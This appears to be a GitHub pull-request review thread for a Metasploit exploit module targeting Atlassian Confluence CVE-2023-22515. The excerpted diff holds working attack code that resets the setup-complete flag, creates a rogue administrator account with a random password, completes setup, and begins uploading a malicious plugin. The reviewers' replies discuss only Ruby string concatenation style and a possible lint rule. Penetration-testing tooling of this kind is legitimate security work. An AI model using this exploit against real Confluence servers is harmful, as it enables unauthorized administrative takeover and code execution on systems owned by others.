modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22515.rb

```diff
@@ -0,0 +1,319 @@
+            return Exploit::CheckCode::Appears("Atlassian Confluence #{version}")
+          end
+        end
+
+        # By here we know we have a confluence server, but the version found indicates it is safe.
+        return Exploit::CheckCode::Safe("Atlassian Confluence #{version}")
+      end
+    end
+
+    # By here we have identified a Confluence server, but could not get the version number to determine if it is
+    # vulnerable of not.
+    CheckCode::Detected
+  end
+
+  def exploit
+    target_endpoint = normalize_uri(target_uri.path, datastore['CONFLUENCE_TARGET_ENDPOINT'])
+
+    print_status("Setting the application configuration's setupComplete to false via endpoint: #{target_endpoint}")
+
+    # 1. Leverage CVE-2023-22515 to modify a configuration setting, allowing us to reach the /setup/* endpoints.
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => target_endpoint,
+      'vars_post' => {
+        'bootstrapStatusProvider.applicationConfig.setupComplete' => 'false'
+      }
+    )
+
+    unless res&.code == 302 || res&.code == 200
+      fail_with(Failure::UnexpectedReply, "Unexpected reply from endpoint: #{target_endpoint}")
+    end
+
+    print_status('Creating a new administrator user account...')
+
+    # usernames must be lowercase
+    admin_username = rand_text_alpha_lower(8)
+    admin_password = rand_text_alphanumeric(8)
+
+    # 2. Create a new administrator user account.
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'setup', 'setupadministrator.action'),
+      'headers' => {
+        'X-Atlassian-Token' => 'no-check'
+      },
+      'vars_post' => {
+        'username' => admin_username,
+        'fullName' => rand_text_alphanumeric(8),
+        'email' => "#{rand_text_alphanumeric(8)}@localhost",
+        'password' => admin_password,
+        'confirm' => admin_password,
+        'setup-next-button' => 'Next'
+      }
+    )
+
+    unless res&.code == 302 || res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /setup/setupadministrator.action')
+    end
+
+    print_status("Created #{admin_username}:#{admin_password}")
+
+    # 3. force the setup to become compleated, to allow normal Confluence operation to continue.
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'setup', 'finishsetup.action'),
+      'headers' => {
+        'X-Atlassian-Token' => 'no-check'
+      }
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /setup/finishsetup.action')
+    end
+
+    print_status('Adding a malicious plugin...')
+
+    # 4. Upload a new Confluence Servlet plugin, by first requesting a UPM token.
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0') << '/',
```

Comment:
```suggestion
      'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0') + '/',
```

- `+`: Returns the concatenation of self and a given other string.
- `<<`: <<: Returns self concatenated with a given string or integer.

so I guess it's a matter of taste, but I think™ that people are more used to `+` for string concatenation than `<<`, especially given that the later is usually used to append a single element to an array.

Reply:
My understanding is that in Ruby the `<<` operator is faster, and so is the generally the preferred operator to concat two strings. Happy to change this is using `+` is the best practice.

Reply:
`<<` is faster, but also the source of multiple bugs in framework 😄

Reply:
Thanks Alan, sounds like `+` should be the preferred operator so, I have done this via [34107e4](https://github.com/rapid7/metasploit-framework/pull/18461/commits/34107e4f3b95a3f7719b9b798338041541070bfd)

Reply:
This comes up every few years, under various guises; and while i'm all for reducing allocations... `+` actually creates them (or did, anyway - a bit behind on my RubyVM-fu). Using `<<` appends the contents of the right buffer to that on the left (eventually meaning "scatter-gather addition of existing SG buffer" under Linux anyway) whereas `+` creates a new buffer copying both sides into it and then hopefully deallocating the sources. Up here in `Msf` it might not be as noticeable, but down in `Rex` it can get pretty bad if you have a lot of IO and under memory pressure against various forms of GC. Back in the RBX days when VM instrumentation was "cool," we actually saw this effect pretty clearly during my machinations with `rex-guts-n-stuff`

Reply:
Would it be worth adding a rubocop/msftidy rule to catch this?

Reply:
> Would it be worth adding a rubocop/msftidy rule to catch this?

Sounds like a great idea to me